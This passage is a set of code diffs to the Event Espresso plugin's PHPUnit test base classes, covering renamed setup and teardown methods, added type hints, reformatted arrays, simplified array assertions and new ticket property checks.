                 TICKET_SELECTOR_TEMPLATES_PATH . 'ticket_details.template.php',

--- a/tests/includes/EE_REST_TestCase.php
+++ b/tests/includes/EE_REST_TestCase.php
@@ -15,13 +15,13 @@ abstract class EE_REST_TestCase extends EE_UnitTestCase
 {
     protected $server;
 
-    public function setUp()
+    public function set_up()
     {
         //let's know about any errors
         if (!defined('EE_REST_API_DEBUG_MODE')) {
             define('EE_REST_API_DEBUG_MODE', true);
         }
-        parent::setUp();
+        parent::set_up();
         if (! class_exists('WP_Rest_Request')
             || ! class_exists('Spy_REST_Server')) {
             $this->markTestSkipped(
@@ -45,9 +45,9 @@ abstract class EE_REST_TestCase extends EE_UnitTestCase
         do_action('rest_api_init');
     }
 
-    public function tearDown()
+    public function tear_down()
     {
-        parent::tearDown();
+        parent::tear_down();
         remove_filter('rest_url', array($this, 'test_rest_url_for_leading_slash'), 10, 2);
         /** @var WP_REST_Server $wp_rest_server */
         global $wp_rest_server;

--- a/tests/includes/EE_UnitTestCase.class.php
+++ b/tests/includes/EE_UnitTestCase.class.php
@@ -1297,6 +1297,8 @@ class EE_UnitTestCase extends WP_UnitTestCase
      */
     public function new_ticket(array $options = []): EE_Ticket
     {
+        // echo "\n\noptions\n";
+        // var_export($options);
         // copy incoming options to use for ticket args
         $ticket_args = $options;
         // make sure ticket price is set or use default of 16.50
@@ -1414,6 +1416,21 @@ class EE_UnitTestCase extends WP_UnitTestCase
                 $this->assertArrayContains($ddt, $ticket->datetimes());
             }
         }
+
+        foreach ($ticket_args as $prop => $value) {
+            switch ($prop) {
+                case 'TKT_start_date':
+                    $this->assertEquals($value, $ticket->start_date('U', null));
+                    break;
+                case 'TKT_end_date':
+                    $this->assertEquals($value, $ticket->end_date('U', null));
+                    break;
+                default:
+                    $this->assertEquals($value, $ticket->get($prop));
+            }
+        }
+        // echo "\n\nticket_args\n";
+        // var_export($ticket_args);
 
         //resave ticket to account for possible field value changes
         $ticket->save();

--- a/tests/includes/EE_UnitTestCase.class.php
+++ b/tests/includes/EE_UnitTestCase.class.php
@@ -161,7 +161,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * @param string $sql
      * @return bool
      */
-    public function _short_circuit_db_implicit_commits($short_circuit = FALSE, $table_name, $sql)
+    public function _short_circuit_db_implicit_commits($short_circuit = FALSE, $table_name = '', $sql = '')
     {
         $whitelisted_tables = apply_filters('FHEE__EE_UnitTestCase__short_circuit_db_implicit_commits__whitelisted_tables', array());
         if (in_array($table_name, $whitelisted_tables, true)) {
@@ -1441,7 +1441,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
         if (method_exists($this, 'expectException')) {
             parent::expectException($exception);
         } elseif (method_exists($this, 'setExpectedException')) {
-            $this->setExpectedException($exception);
+            parent::setExpectedException($exception);
         }
         if ($code !== null && method_exists($this, 'expectExceptionCode')) {
             parent::expectExceptionCode($code);

--- a/tests/includes/EE_UnitTestCase.class.php
+++ b/tests/includes/EE_UnitTestCase.class.php
@@ -5,19 +5,19 @@ use EventEspresso\core\domain\services\contexts\RequestTypeContextChecker;
 use EventEspresso\core\services\loaders\LoaderFactory;
 use EventEspresso\core\services\loaders\LoaderInterface;
 use EventEspresso\core\services\request\RequestInterface;
-use EventEspresso\core\services\request\Response;
 use EventEspresso\core\services\request\ResponseInterface;
 
 /**
  * This is used to override any existing WP_UnitTestCase methods that need specific handling in EE.  We
  * can also add additional methods in here for EE tests (that are used frequently)
  *
- * @since        4.3.0
+ * @since          4.3.0
  * @package        Event Espresso
- * @subpackage    tests
+ * @subpackage     tests
  */
 class EE_UnitTestCase extends WP_UnitTestCase
 {
+    const error_code_undefined_property = 8;
 
     /**
      * @var EE_UnitTest_Factory
@@ -27,13 +27,14 @@ class EE_UnitTestCase extends WP_UnitTestCase
     /**
      * Should be used to store the global $wp_actions during a test
      * so that it can be restored afterwards to keep tests from interfere with each other
+     *
      * @var array
      */
-    protected $wp_filters_saved = NULL;
-    const error_code_undefined_property = 8;
-    protected $_cached_SERVER_NAME = NULL;
+    protected $wp_filters_saved    = null;
+
+    protected $_cached_SERVER_NAME = null;
+
     /**
-     *
      * @var WP_User
      */
     protected $_orig_current_user;
@@ -41,10 +42,10 @@ class EE_UnitTestCase extends WP_UnitTestCase
     /**
      * Boolean indicating we've already noted an accidental txn commit and we don't need to
      * keep checking or warning the test runner about it
+     *
      * @var boolean
      */
-    public static $accidental_txn_commit_noted = FALSE;
-
+    public static $accidental_txn_commit_noted = false;
 
     /**
      * Holds an array of default DateTime objects for testing with.
@@ -54,7 +55,6 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * @var array.
      */
     protected $_default_dates;
-
 
     /**
      * @var EE_Test_Scenario_Factory
@@ -102,29 +102,32 @@ class EE_UnitTestCase extends WP_UnitTestCase
     // }
 
 
+    /**
+     * @throws EE_Error
+     */
     public function set_up()
     {
         // echo "\n\n" . strtoupper($this->getName()) . '()';
         //save the hooks state before WP_UnitTestCase actually gets its hands on it...
         //as it immediately adds a few hooks we might not want to backup
         global $auto_made_thing_seed, $wp_filter, $wp_actions, $merged_filters, $wp_current_filter, $wpdb, $current_user;
-        $this->wp_filters_saved = array(
-            'wp_filter' => $wp_filter,
-            'wp_actions' => $wp_actions,
-            'merged_filters' => $merged_filters,
-            'wp_current_filter' => $wp_current_filter
-        );
+        $this->wp_filters_saved   = [
+            'wp_filter'         => $wp_filter,
+            'wp_actions'        => $wp_actions,
+            'merged_filters'    => $merged_filters,
+            'wp_current_filter' => $wp_current_filter,
+        ];
         $this->_orig_current_user = $current_user instanceof WP_User ? clone $current_user : new WP_User(1);
         parent::set_up();
         $auto_made_thing_seed = 1;
         //reset wpdb's list of queries executed so it only stores those from the current test
-        $wpdb->queries = array();
+        $wpdb->queries = [];
         //the accidental txn commit indicator option shouldn't be set from the previous test
-        update_option('accidental_txn_commit_indicator', TRUE);
+        update_option('accidental_txn_commit_indicator', true);
 
         // Fake WP mail globals, to avoid errors
-        add_filter('wp_mail', array($this, 'setUp_wp_mail'));
-        add_filter('wp_mail_from', array($this, 'tearDown_wp_mail'));
+        add_filter('wp_mail', [$this, 'setUp_wp_mail']);
+        add_filter('wp_mail_from', [$this, 'tearDown_wp_mail']);
         add_filter('FHEE__EEH_Activation__create_table__short_circuit', '__return_true');
         add_filter('FHEE__EEH_Activation__add_column_if_it_doesnt_exist__short_circuit', '__return_true');
         add_filter('FHEE__EEH_Activation__drop_index__short_circuit', '__return_true');
@@ -133,44 +136,41 @@ class EE_UnitTestCase extends WP_UnitTestCase
         EEH_Autoloader::register_autoloaders_for_each_file_in_folder(EE_TESTS_DIR . 'includes/factories');
         $this->factory = new EE_UnitTest_Factory();
 
-        //IF we detect we're running tests on WP4.1, then we need to make sure current_user_can tests pass by implementing
-        //updating all_caps when `WP_User::add_cap` is run (which is fixed in later wp versions).  So we hook into the
-        // 'user_has_cap' filter to do this
-        $_wp_test_version = getenv('WP_VERSION');
-        if ($_wp_test_version && $_wp_test_version === '4.1') {
-            add_filter('user_has_cap', function ($all_caps, $caps, $args, WP_User $WP_User) {
-                $WP_User->get_role_caps();
-
-                return $WP_User->allcaps;
-            }, 10, 4);
-        }
         //tell EE_Registry to do a hard reset
-        add_filter( 'FHEE__EE_Registry__reset__hard', '__return_true');
+        add_filter('FHEE__EE_Registry__reset__hard', '__return_true');
         do_action('AHEE__EventEspresso_core_services_loaders_CachingLoader__resetCache');
         // turn off caching for any loaders in use during tests
         add_filter('FHEE__EventEspresso_core_services_loaders_CachingLoader__load__bypass_cache', '__return_true');
-        $this->loader = LoaderFactory::getLoader();
+        $this->loader         = LoaderFactory::getLoader();
         $this->dependency_map = $this->loader->getShared('EE_Dependency_Map');
-        $this->request = $this->loader->getShared('EventEspresso\core\services\request\RequestInterface');
+        $this->request        = $this->loader->getShared('EventEspresso\core\services\request\RequestInterface');
     }
 
 
     /**
-     * @param bool $short_circuit
+     * @param bool   $short_circuit
      * @param string $table_name
      * @param string $sql
      * @return bool
      */
-    public function _short_circuit_db_implicit_commits($short_circuit = FALSE, $table_name = '', $sql = '')
-    {
-        $whitelisted_tables = apply_filters('FHEE__EE_UnitTestCase__short_circuit_db_implicit_commits__whitelisted_tables', array());
+    public function _short_circuit_db_implicit_commits(
+        bool $short_circuit = false,
+        string $table_name = '',
+        string $sql = ''
+    ): bool {
+        $whitelisted_tables =
+            apply_filters('FHEE__EE_UnitTestCase__short_circuit_db_implicit_commits__whitelisted_tables', []);
         if (in_array($table_name, $whitelisted_tables, true)) {
             //it's not altering. it's ok
-            return FALSE;
+            return false;
         }
         return true;
     }
 
+
+    /**
+     * @throws EE_Error
+     */
     public function tear_down()
     {
         parent::tear_down();
@@ -187,15 +187,15 @@ class EE_UnitTestCase extends WP_UnitTestCase
         }
         $this->dependency_map->reset();
         global $wp_filter, $wp_actions, $merged_filters, $wp_current_filter, $current_user;
-        $wp_filter = $this->wp_filters_saved['wp_filter'];
-        $wp_actions = $this->wp_filters_saved['wp_actions'];
-        $merged_filters = $this->wp_filters_saved['merged_filters'];
+        $wp_filter         = $this->wp_filters_saved['wp_filter'];
+        $wp_actions        = $this->wp_filters_saved['wp_actions'];
+        $merged_filters    = $this->wp_filters_saved['merged_filters'];
         $wp_current_filter = $this->wp_filters_saved['wp_current_filter'];
-        $current_user = $this->_orig_current_user;
+        $current_user      = $this->_orig_current_user;
         $this->_detect_accidental_txn_commit();
         $notices = EE_Error::get_notices(false, false, true);
         EE_Error::reset_notices();
-        if (!empty($notices['errors'])) {
+        if (! empty($notices['errors'])) {
             $error_message = sprintf(
                 'The following error(s) occurred during test "%1$s" : %2$s',
                 get_called_class() . '::' . $this->getName() . '()',
@@ -216,7 +216,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * @throws Exception
      * @since $VID:$
      */
-    protected function setupRequest($request_type_slug = RequestTypeContext::ADMIN)
+    protected function setupRequest(string $request_type_slug = RequestTypeContext::ADMIN)
     {
         $request_type_context = new RequestTypeContext($request_type_slug, 'mock request type');
         $request_type_context->setIsUnitTesting(true);
@@ -232,7 +232,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
         /** @var EventEspresso\tests\mocks\core\services\routing\RouterMock $router */
         $router = $this->loader->getShared('EventEspresso\tests\mocks\core\services\routing\RouterMock');
         $router->loadPrimaryRoutes();
-        switch($request_type_slug) {
+        switch ($request_type_slug) {
             case RequestTypeContext::ADMIN:
                 $router->addRoute('EventEspresso\core\domain\entities\routing\handlers\admin\EspressoLegacyAdmin');
                 $router->addRoute('EventEspresso\core\domain\entities\routing\handlers\admin\EspressoEventsAdmin');
@@ -272,6 +272,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
         return $this->response;
     }
 
+
     protected function loadTestScenarios()
     {
         // load scenarios
@@ -279,14 +280,16 @@ class EE_UnitTestCase extends WP_UnitTestCase
         $this->scenarios = new EE_Test_Scenario_Factory($this);
     }
 
+
     /**
      * Detects whether or not a MYSQL query was issued which caused an implicit commit
      * (or an explicit one). Basically, we can't do a commit mid-test because it messes
      * up the test's state (which means the database state at the time of the commit will
      * become the new starting state for all future tests, which will likely cause hard-to-find
      * bugs, and makes test results dependent on order of execution)
-     * @global WPDB $wpdb
+     *
      * @throws EE_Error
+     * @global WPDB $wpdb
      */
     protected function _detect_accidental_txn_commit()
     {
@@ -294,10 +297,19 @@ class EE_UnitTestCase extends WP_UnitTestCase
         //we prefer to do it now so that we can check for implicit commits
         $this->clean_up_global_scope();
         //now we can check if there was an accidental implicit commit
-        if (!self::$accidental_txn_commit_noted && get_option('accidental_txn_commit_indicator', FALSE)) {
+        if (! self::$accidental_txn_commit_noted && get_option('accidental_txn_commit_indicator', false)) {
             global $wpdb;
-            self::$accidental_txn_commit_noted = TRUE;
-            throw new EE_Error(sprintf(esc_html__("Accidental MySQL Commit was issued sometime during the previous test. This means we couldn't properly restore database to its pre-test state. If this doesnt create problems now it probably will later! Read up on MySQL commits, especially Implicit Commits. Queries executed were: \r\n%s. \r\nThis accidental commit happened during %s", 'event_espresso'), print_r($wpdb->queries, TRUE), $this->getName()));
+            self::$accidental_txn_commit_noted = true;
+            throw new EE_Error(
+                sprintf(
+                    esc_html__(
+                        "Accidental MySQL Commit was issued sometime during the previous test. This means we couldn't properly restore database to its pre-test state. If this doesnt create problems now it probably will later! Read up on MySQL commits, especially Implicit Commits. Queries executed were: \r\n%s. \r\nThis accidental commit happened during %s",
+                        'event_espresso'
+                    ),
+                    print_r($wpdb->queries, true),
+                    $this->getName()
+                )
+            );
         }
     }
 
@@ -307,7 +319,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
      *  that they are fresh between tests.
      *
      * @todo this of course means we need an easy way to reset our singletons...
-     * @see parent::cleanup_global_scope();
+     * @see  parent::cleanup_global_scope();
      */
     public function clean_up_global_scope()
     {
@@ -325,8 +337,6 @@ class EE_UnitTestCase extends WP_UnitTestCase
         }
 
         $_SERVER['SERVER_NAME'] = 'example.com';
-
-        // passthrough
         return $args;
     }
 
@@ -336,14 +346,12 @@ class EE_UnitTestCase extends WP_UnitTestCase
      */
     public function tearDown_wp_mail($args)
     {
-        if (!empty($this->_cached_SERVER_NAME)) {
+        if (! empty($this->_cached_SERVER_NAME)) {
             $_SERVER['SERVER_NAME'] = $this->_cached_SERVER_NAME;
             unset($this->_cached_SERVER_NAME);
         } else {
             unset($_SERVER['SERVER_NAME']);
         }
-
-        // passthrough
         return $args;
     }
 
@@ -352,9 +360,11 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * Helper method for setting the maintenance mode of EE to given maintenance mode
      *
      * @param int $level use to indicate which maintenance mode to set.
+     * @throws EE_Error
+     * @throws ReflectionException
      * @since 4.3.0
      */
-    public function setMaintenanceMode($level = 0)
+    public function setMaintenanceMode(int $level = 0)
     {
         EE_Registry::instance()->load_core('Maintenance_Mode');
         switch ($level) {
@@ -377,6 +387,8 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * Helper method for just setting the core config and net config on EE_Registry, so
      * configuration tests can be run.
      *
+     * @throws EE_Error
+     * @throws ReflectionException
      * @since 4.3.0
      */
     public function setCoreConfig()
@@ -393,18 +405,18 @@ class EE_UnitTestCase extends WP_UnitTestCase
      */
     public function resetCoreConfig()
     {
-        EE_Registry::instance()->CFG = NULL;
-        EE_Registry::instance()->NET_CFG = NULL;
+        EE_Registry::instance()->CFG     = null;
+        EE_Registry::instance()->NET_CFG = null;
     }
 
 
     /**
      * Method that accepts an array of filter refs to clear all filters from.
      *
+     * @param array $filters array of filter refs to clear. (be careful about core wp filters).
      * @since 4.3.0
-     * @param  array $filters array of filter refs to clear. (be careful about core wp filters).
      */
-    public function clearAllFilters($filters = array())
+    public function clearAllFilters(array $filters = [])
     {
         foreach ($filters as $filter) {
             remove_all_filters($filter);
@@ -415,10 +427,10 @@ class EE_UnitTestCase extends WP_UnitTestCase
     /**
      * Method that accepts an array of action refs to clear all actions from.
      *
+     * @param array $actions array of action refs to clear. (be careful about core wp actions).
      * @since 4.3.0
-     * @param  array $actions array of action refs to clear. (be careful about core wp actions).
      */
-    public function clearAllActions($actions = array())
+    public function clearAllActions(array $actions = [])
     {
         foreach ($actions as $action) {
             remove_all_actions($action);
@@ -427,14 +439,14 @@ class EE_UnitTestCase extends WP_UnitTestCase
 
 
     /**
-     * This defines EE_Admin_Constants to point to the admin mocks * folder instead of the default admin folder.  Note, you will need
-     * to be careful of using this.
+     * This defines EE_Admin_Constants to point to the admin mocks * folder instead of the default admin folder.  Note,
+     * you will need to be careful of using this.
      *
      * @since 4.3.0
      */
     public function defineAdminConstants()
     {
-        if (!defined('EE_ADMIN_PAGES')){
+        if (! defined('EE_ADMIN_PAGES')) {
             define('EE_ADMIN_PAGES', EE_TESTS_DIR . 'mocks/admin');
         }
     }
@@ -456,13 +468,14 @@ class EE_UnitTestCase extends WP_UnitTestCase
 
     /**
      * This loads the various admin page mock files required for tests.
-     * Note these pages should be loaded on demand, because constants will be defined that will interfere with other Admin Page loading tests.
-     * @since 4.6.0
+     * Note these pages should be loaded on demand, because constants will be defined that will interfere with other
+     * Admin Page loading tests.
+     *
      * @param string $page
+     * @since 4.6.0
      */
-    public function delayedAdminPageMocks($page = '')
+    public function delayedAdminPageMocks(string $page = '')
     {
-
         switch ($page) {
             case 'decaf_events' :
             case 'events' :
@@ -477,7 +490,6 @@ class EE_UnitTestCase extends WP_UnitTestCase
             case 'messages' :
                 require_once EE_TESTS_DIR . 'mocks/admin/messages/Messages_Admin_Page_Mock.php';
                 break;
-
         }
     }
 
@@ -491,7 +503,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
     /**
      * @param array $ModelsMocks array of Model class names like "EEM_Event"
      */
-    public function loadModelsMocks($ModelsMocks = array())
+    public function loadModelsMocks(array $ModelsMocks = [])
     {
         foreach ($ModelsMocks as $ModelsMock) {
             require_once EE_TESTS_DIR . 'mocks/core/db_models/' . $ModelsMock . '_Mock.php';
@@ -502,7 +514,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
     /**
      * @param array $ModelFieldMocks array of Model Field class names like "EE_Datetime_Field"
      */
-    public function loadModelFieldMocks($ModelFieldMocks = array())
+    public function loadModelFieldMocks(array $ModelFieldMocks = [])
     {
         foreach ($ModelFieldMocks as $ModelFieldMock) {
             require_once EE_TESTS_DIR . 'mocks/core/db_models/fields/' . $ModelFieldMock . '_Mock.php';
@@ -513,7 +525,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
     /**
      * @param array $ModuleMocks array of Module class names like "EED_Single_Page_Checkout"
      */
-    public function loadModuleMocks($ModuleMocks = array())
+    public function loadModuleMocks(array $ModuleMocks = [])
     {
         foreach ($ModuleMocks as $ModuleMock) {
             require_once EE_TESTS_DIR . 'mocks/modules/' . $ModuleMock . '_Mock.php';
@@ -526,10 +538,10 @@ class EE_UnitTestCase extends WP_UnitTestCase
      *
      * @return array
      */
-    public function date_formats_to_test()
+    public function date_formats_to_test(): array
     {
-        return array(
-            'date' => array(
+        return [
+            'date' => [
                 'F j, Y',
                 'Y-m-d',
                 'm/d/Y',
@@ -538,16 +550,16 @@ class EE_UnitTestCase extends WP_UnitTestCase
                 'd-m-Y',
                 'm-d-Y',
                 'd-m Y',
-                '\D\a\t\e\: Y-m-d'
-            ),
-            'time' => array(
+                '\D\a\t\e\: Y-m-d',
+            ],
+            'time' => [
                 'g:i a',
                 'g:i A',
                 'H: i',
                 'h:i:s a',
-                '\T\i\m\e\: g:i a'
-            )
-        );
+                '\T\i\m\e\: g:i a',
+            ],
+        ];
     }
 
 
@@ -555,16 +567,17 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * This sets a bunch of default dates for common data properties using dates for testing.
      *
      * @param string $timezone Timezone string to initialize the times in.
+     * @throws Exception
      */
-    protected function _set_default_dates($timezone = 'America/Vancouver')
+    protected function _set_default_dates(string $timezone = 'America/Vancouver')
     {
-        $tz = new DateTimeZone($timezone);
-        $this->_default_dates = array(
+        $tz                   = new DateTimeZone($timezone);
+        $this->_default_dates = [
             'DTT_start' => new DateTime('2015-02-20 11:30 am', $tz),
-            'DTT_end' => new DateTime('2015-02-20 2:00 pm', $tz),
+            'DTT_end'   => new DateTime('2015-02-20 2:00 pm', $tz),
             'TKT_start' => new DateTime('2015-01-30 8:00 am', $tz),
-            'TKT_end' => new DateTime('2015-02-20 8:00 am', $tz)
-        );
+            'TKT_end'   => new DateTime('2015-02-20 8:00 am', $tz),
+        ];
     }
 
 
@@ -598,19 +611,19 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * @param bool     $adding_interval
      * @return string
      */
-    protected function _get_one_month_period_offset_in_days(DateTime $now, $adding_interval = true)
+    protected function _get_one_month_period_offset_in_days(DateTime $now, bool $adding_interval = true): string
     {
-        $year = (int)$now->format('Y');
-        $month = (int)$now->format('n');
-        $day = (int)$now->format('j');
+        $year  = (int) $now->format('Y');
+        $month = (int) $now->format('n');
+        $day   = (int) $now->format('j');
         // determine how to increment or decrement the year and month
         if ($adding_interval && $month === 12) {
             // adding a month to december?
             $year++;
             $month = 1;
-        } else if ($adding_interval) {
+        } elseif ($adding_interval) {
             $month++;
-        } else if ($month === 1) {
+        } elseif ($month === 1) {
             $year--;
             $month = 12;
         } else {
@@ -619,9 +632,9 @@ class EE_UnitTestCase extends WP_UnitTestCase
         // create a date for the first day in the offset month (actual day doesn't really matter)
         $offset_month = new DateTime("{$year}-{$month}-01");
         // get the number of days in the offset month
-        $days_in_offset_month = (int)$offset_month->format('t');
+        $days_in_offset_month = (int) $offset_month->format('t');
         // get the number of days in the original passed month
-        $days_in_month = (int)$now->format('t');
+        $days_in_month = (int) $now->format('t');
         // now figure out what period to actually return
         // by looking at whether we are adding or subtract a time period
         // and also comparing the days in each month,
@@ -632,12 +645,12 @@ class EE_UnitTestCase extends WP_UnitTestCase
             // so just add the number of days in February
             //echo "\n add days_in_offset_month : " . $days_in_offset_month;
             return "P{$days_in_offset_month}D";
-        } else if ($adding_interval) {
+        } elseif ($adding_interval) {
             // all other additions can safely just use the number of days in the current month
             // ie: Jan 27 can add 31 days
             //echo "\n add days_in_month : " . $days_in_month;
             return "P{$days_in_month}D";
-        } else if ($day > $days_in_offset_month) {
+        } elseif ($day > $days_in_offset_month) {
             // subtract 1 month from March 28, but wait...
             // subtracting 31 days could take us to Feb 25 !!!
             // so just subtract the day of the month we are on
@@ -661,7 +674,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * @return DateTime
      * @throws Exception
      */
-    protected function _get_date_one_month_ago(DateTime $now)
+    protected function _get_date_one_month_ago(DateTime $now): DateTime
     {
         // clone passed date so as not to modify it
         $last_month = clone $now;
@@ -679,8 +692,9 @@ class EE_UnitTestCase extends WP_UnitTestCase
      *
      * @param DateTime $now
      * @return DateTime
+     * @throws Exception
      */
-    protected function _get_date_one_month_from_now(DateTime $now)
+    protected function _get_date_one_month_from_now(DateTime $now): DateTime
     {
         // clone passed date so as not to modify it
         $next_month = clone $now;
@@ -693,25 +707,29 @@ class EE_UnitTestCase extends WP_UnitTestCase
 
     /**
      * @param string $expected_date The expected date string in the given full_format date string format.
-     * @param string $actual_date The actual date string in the given full_format date string format.
-     * @param        $full_format
+     * @param string $actual_date   The actual date string in the given full_format date string format.
+     * @param string $full_format
      * @param string $custom_error_message
      * @throws EE_Error
      */
-    public function assertDateWithinOneMinute($expected_date, $actual_date, $full_format, $custom_error_message = '')
-    {
+    public function assertDateWithinOneMinute(
+        string $expected_date,
+        string $actual_date,
+        string $full_format,
+        string $custom_error_message = ''
+    ) {
         //take the incoming date strings convert to datetime objects and verify they are within one minute of each other
-        $expected_date_obj = date_create_from_format($full_format, $expected_date);
-        $actual_date_obj = date_create_from_format($full_format, $actual_date);
+        $expected_date_obj  = date_create_from_format($full_format, $expected_date);
+        $actual_date_obj    = date_create_from_format($full_format, $actual_date);
         $date_parsing_error = '';
-        if (!$expected_date_obj instanceof DateTime) {
+        if (! $expected_date_obj instanceof DateTime) {
             $date_parsing_error = sprintf(
                 esc_html__('Expected date %1$s could not be parsed into format %2$s', 'event_espresso'),
                 print_r($expected_date, true),
                 $full_format
             );
         }
-        if (!$actual_date_obj instanceof DateTime) {
+        if (! $actual_date_obj instanceof DateTime) {
             $date_parsing_error = sprintf(
                 esc_html__('Actual date %1$s could not be parsed into format %2$s', 'event_espresso'),
                 print_r($actual_date, true),
@@ -721,8 +739,8 @@ class EE_UnitTestCase extends WP_UnitTestCase
         if ($date_parsing_error) {
             throw new EE_Error($date_parsing_error);
         }
-        $difference = $actual_date_obj->format('U') - $expected_date_obj->format('U');
-        $custom_error_message = !empty($custom_error_message)
+        $difference           = $actual_date_obj->format('U') - $expected_date_obj->format('U');
+        $custom_error_message = ! empty($custom_error_message)
             ? $custom_error_message
             : sprintf(
                 esc_html__(
@@ -739,145 +757,166 @@ class EE_UnitTestCase extends WP_UnitTestCase
     /**
      * This sets up some save data for use in testing updates and saves via the event editor.
      *
-     * @todo Add extra event data for testing event creation/save.
-     * @param string $format The format used for incoming date strings.
-     * @param string $prefix A string to prefix the fields being assembled.  Used as a way of
+     * @param string $format          The format used for incoming date strings.
+     * @param string $prefix          A string to prefix the fields being assembled.  Used as a way of
      *                                differentiating between multiple calls.
-     * @param string $row Equals the value we want to give for row.
-     * @param string $timezone Timezone string to add to the timezone data point.  Remember that
+     * @param string $row             Equals the value we want to give for row.
+     * @param string $timezone        Timezone string to add to the timezone data point.  Remember that
      *                                $this->_default_date() datetime objects are used for the default dates, so if
      *                                you include a string here make sure it matches what you set used for setting
      *                                _default_dates unless you are intentionally testing timezone mismatches.
      *
      * @return array of data in post format from the save action.
+     * @todo Add extra event data for testing event creation/save.
      */
-    protected function _get_save_data($format = 'Y-m-d h:i a', $prefix = '', $row = '1', $timezone = 'America/Vancouver')
-    {
-        $data = array(
-            'starting_ticket_datetime_rows' => array(
-                $row => ''
-            ),
-            'ticket_datetime_rows' => array(
-                $row => '1'
-            ),
-            'datetime_IDs' => '',
-            'edit_event_datetimes' => array(
-                $row => array(
-                    'DTT_EVT_end' => $this->_default_dates['DTT_end']->format($format),
-                    'DTT_EVT_start' => $this->_default_dates['DTT_start']->format($format),
-                    'DTT_ID' => '0',
-                    'DTT_name' => $prefix . ' Datetime A',
+    protected function _get_save_data(
+        string $format = 'Y-m-d h:i a',
+        string $prefix = '',
+        string $row = '1',
+        string $timezone = 'America/Vancouver'
+    ): array {
+        return [
+            'starting_ticket_datetime_rows' => [
+                $row => '',
+            ],
+            'ticket_datetime_rows'          => [
+                $row => '1',
+            ],
+            'datetime_IDs'                  => '',
+            'edit_event_datetimes'          => [
+                $row => [
+                    'DTT_EVT_end'     => $this->_default_dates['DTT_end']->format($format),
+                    'DTT_EVT_start'   => $this->_default_dates['DTT_start']->format($format),
+                    'DTT_ID'          => '0',
+                    'DTT_name'        => $prefix . ' Datetime A',
                     'DTT_description' => $prefix . ' Lorem Ipsum Emitetad',
-                    'DTT_reg_limit' => '',
-                    'DTT_order' => $row
-                )
-            ),
-            'edit_tickets' => array(
-                $row => array(
-                    'TKT_ID' => '0',
-                    'TKT_base_price' => '0',
+                    'DTT_reg_limit'   => '',
+                    'DTT_order'       => $row,
+                ],
+            ],
+            'edit_tickets'                  => [
+                $row => [
+                    'TKT_ID'            => '0',
+                    'TKT_base_price'    => '0',
                     'TKT_base_price_ID' => '1',
-                    'TTM_ID' => '0',
-                    'TKT_name' => $prefix . ' Ticket A',
-                    'TKT_description' => $prefix . ' Lorem Ipsum Tekcit',
-                    'TKT_start_date' => $this->_default_dates['TKT_start']->format($format),
-                    'TKT_end_date' => $this->_default_dates['TKT_end']->format($format),
-                    'TKT_qty' => '',
-                    'TKT_uses' => '',
-                    'TKT_min' => '',
-                    'TKT_max' => '',
-                    'TKT_row' => '',
-                    'TKT_order' => $row,
-                    'TKT_taxable' => '0',
-                    'TKT_required' => '0',
-                    'TKT_price' => '0',
-                    'TKT_is_default' => '0'
-                )
-            ),
-            'edit_prices' => array(
-                $row => array(
-                    'PRT_ID' => '1',
-                    'PRC_ID' => '0',
-                    'PRC_amount' => '0',
-                    'PRC_name' => $prefix . ' Price A',
-                    'PRC_desc' => $prefix . ' Lorem Ipsum Ecirp',
+                    'TTM_ID'            => '0',
+                    'TKT_name'          => $prefix . ' Ticket A',
+                    'TKT_description'   => $prefix . ' Lorem Ipsum Tekcit',
+                    'TKT_start_date'    => $this->_default_dates['TKT_start']->format($format),
+                    'TKT_end_date'      => $this->_default_dates['TKT_end']->format($format),
+                    'TKT_qty'           => '',
+                    'TKT_uses'          => '',
+                    'TKT_min'           => '',
+                    'TKT_max'           => '',
+                    'TKT_row'           => '',
+                    'TKT_order'         => $row,
+                    'TKT_taxable'       => '0',
+                    'TKT_required'      => '0',
+                    'TKT_price'         => '0',
+                    'TKT_is_default'    => '0',
+                ],
+            ],
+            'edit_prices'                   => [
+                $row => [
+                    'PRT_ID'         => '1',
+                    'PRC_ID'         => '0',
+                    'PRC_amount'     => '0',
+                    'PRC_name'       => $prefix . ' Price A',
+                    'PRC_desc'       => $prefix . ' Lorem Ipsum Ecirp',
                     'PRC_is_default' => '1',
-                    'PRC_order' => $row
-                )
-            ),
-            'timezone_string' => $timezone
-        );
-        return $data;
+                    'PRC_order'      => $row,
+                ],
+            ],
+            'timezone_string'               => $timezone,
+        ];
     }
 
 
     /**
      * IT would be better to add a constraint and do this properly at some point
+     *
      * @param mixed $item
-     * @param       $haystack
+     * @param array $haystack
      */
-    public function assertArrayContains($item, $haystack)
+    public function assertArrayContains($item, array $haystack)
     {
-        $in_there = in_array($item, $haystack, true);
-        if ($in_there) {
-            $this->assertTrue(true);
-        } else {
-            $this->assertTrue($in_there, sprintf(esc_html__('Array %1$s does not contain %2$s', 'event_espresso'), print_r($haystack, true), print_r($item, true)));
-        }
+        $this->assertTrue(
+            in_array($item, $haystack, true),
+            sprintf(
+                esc_html__('Array %1$s does not contain %2$s', 'event_espresso'),
+                print_r($haystack, true),
+                print_r($item, true)
+            )
+        );
     }
 
 
     /**
-     * @param $item
-     * @param $haystack
+     * @param mixed $item
+     * @param array $haystack
      */
-    public function assertArrayDoesNotContain($item, $haystack)
+    public function assertArrayDoesNotContain($item, array $haystack)
     {
-        $not_in_there = !in_array($item, $haystack, true);
-        if ($not_in_there) {
-            $this->assertTrue($not_in_there);
-        } else {
-            $this->assertTrue($not_in_there, sprintf(esc_html__('Array %1$s DOES contain %2$s when it shouldn\'t', 'event_espresso'), print_r($haystack, true), print_r($item, true)));
-        }
+        $this->assertFalse(
+            in_array($item, $haystack, true),
+            sprintf(
+                esc_html__('Array %1$s DOES contain %2$s when it shouldn\'t', 'event_espresso'),
+                print_r($haystack, true),
+                print_r($item, true)
+            )
+        );
     }
+
 
     /**
      *
